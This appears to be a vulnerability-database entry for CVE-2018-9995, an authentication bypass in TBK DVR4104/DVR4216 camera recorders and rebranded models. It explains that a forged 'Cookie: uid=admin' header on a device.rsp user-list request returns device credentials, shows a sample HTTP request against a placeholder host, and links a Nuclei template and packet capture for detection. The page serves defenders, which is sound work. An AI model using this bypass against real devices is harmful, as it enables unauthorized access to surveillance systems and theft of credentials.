🔙 목록으로 돌아가기

CVE-2018-9995: TBK DVR4104/DVR4216 Devices - Authentication Bypass

TitleTBK DVR4104/DVR4216 Devices - Authentication Bypass
Authorprincechaddha
SeverityCritical
ImpactAn attacker can bypass authentication and gain unauthorized access to the device, potentially leading to unauthorized configuration changes or data exfiltration.
RemediationApply the latest firmware update provided by the vendor to fix the authentication bypass vulnerability and ensure strong and unique passwords are used for device access.
CVSS Score9.8
EPSS Score0.94122
CVE IDCVE-2018-9995
Tags cve cve2018 auth-bypass tbk edb tbkvision vkev vuln

🔍 Vulnerability Description

TBK DVR4104 and DVR4216 devices, as well as Novo, CeNova, QSee, Pulnix, XVR 5 in 1, Securus, Night OWL, DVR Login, HVR Login, and MDVR Login, which run re-branded versions of the original TBK DVR4104 and DVR4216 series, allow remote attackers to bypass authentication via a “Cookie: uid=admin” header, as demonstrated by a device.rsp?opt=user&cmd=list request that provides credentials within JSON data in a response.

🌐 HTTP Request

GET /device.rsp?opt=user&cmd=list HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_4) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.1 Safari/605.1.15
Connection: close
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-9995.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-9995.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A